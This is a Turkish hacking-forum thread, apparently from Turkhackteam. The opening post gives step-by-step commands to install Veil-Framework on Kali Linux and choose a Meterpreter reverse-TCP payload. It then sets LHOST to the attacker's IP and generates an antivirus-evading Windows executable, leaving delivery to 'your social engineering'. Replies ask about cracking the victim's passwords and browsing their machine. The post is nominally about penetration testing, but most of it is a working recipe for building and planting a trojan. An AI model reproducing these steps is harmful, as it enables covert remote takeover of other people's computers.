Kali Linux aracına Veil-Framework nasıl yüklenir? ve burdan trojan üreterek hedef bilgisayara sızma tekniği..VİDEO İZLE

nessina

Yeni üye
17 Mar 2009
29
0
VEİL-FRAMEWORK

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır Bu durumda sistem test edilirken antivirüs yazılımlarının atlatılması gerekmektedir. Bu noktada açık kaynak kodlu olarak geliştirilen Veil-Framework devreye girmektedir.

KURULUM
Öncelikle Kali Linuxa Veil-Framework nasıl yüklenir videoda gösterdiğim şekilde anlatayım.
Kali linuxta terminali açıyoruz aynı zamanda arama sayfasına ''Veil framework github'' yazıp

https://github.com/Veil-Framework/Veil
Veil-Framework sitesine erişeğiz. Zaten ayrıntılı bir şekilde nasıl yüklendiği konusunda komutları ile birlikte yer veriyor terminale ilk önce bu komutu yazacağız.

apt -y install veil

ben videoda opt klasörüne kurdum siz de kendi belirlediğiniz bir klasöre yükleme yapabilirsiniz.Terminale aşağıdaki komutu yazarak opt klasörüne geliceğiz

cd /opt

Eğer ''git''komutu sizin kali linuxa tanımlı değilse aşağıdaki komutu giricez

sudo apt-get -y install git

daha sonra sırasıyla aşağıdaki komutları giriceğiz

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

ortalama 15-20 dakika içinde Veil-Framework yüklenecek. Kurulum bitikten sonra aşağıdaki komutu yazıp Veil.py klasörüne ulaşacağız. Daha sonra aşağıdaki komutu yazıp Veil framework'un ara yüzüne ulaşacağız

python3 Veil.py
karşımıza 2 araç çıkıcak
1) Evasion
2) Ordnance
ve biz 1. kullanacağız. Aşağıdaki komutu yazıp evasion aracına ulaşıcağız

use 1

Evasion sayfasında görüceğiniz üzere 41 tane payload karşımıza çıkıcak, 41 payload'ın anlamı 41 farklı kullanabileceğimiz kodlardır. Aşağıdaki komutu girdiğimiz zaman 41 tane payloadı karşımıza çıkaracak
list
Ben videoda 7. olan payloadı tercih ettim c/meterpreter/rev_tcp.py ve aşağıdaki komutu yazarak payload edeceğimiz framework'e geliriz

use 7

Burda değiştirmemiz gerek bir önemli yer var LHOST özelliğini düzeltmemiz lazım LHOST bizim kendi ip adresimiz olmalı .aşağıdaki komutu yazarak ip adresimizi payloada tanımlıyacağız ve tanımladıktan sonra
set LHOST ip adresiniz
ve tanımladıktan sonra aşağıdaki komutu yazarak LHOST kısmına gözatıp doğruluyacağız

show options

Kodumuzu kaydetmek için aşağıda ki komutu yazıp enter'a basacağız

generate

ve payload hazır hale geldi ve bize payload'ın kaydetiği bölgeyi gösterecek

/var/lib/veil/output/compiled/dosya.exe

bundan sonra bu payloadı yedirmek sizin sosyal mühendisliğinize kalmıştır forumda bununla ilgili epey içerik var gözatabilirsiniz...

VİDEOYU BURDAN İZLİYEBİLİRSİNİZ...

Son düzenleme:

hasanturkes

Yeni üye
17 Nis 2019
14
0
İzmir
Dostum Bu Yöntem İle Sadece Bilgisayarın İçerisindeki Dosyalarımı Görebiliyoruz ? Yoksa Bilgisayarda İşlemler Yapabiliyormuyuz Şifrelerini Kırabiliyormuyuz Falan

KARA ALP

Uzman üye
15 Eyl 2018
1,071
68
İSTİHBARAT
hedef kullanıciya atıldığında cihazda gezmek için hangi araç gerekli oluyor m***ploit üzerindenmi islem görüyoruz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.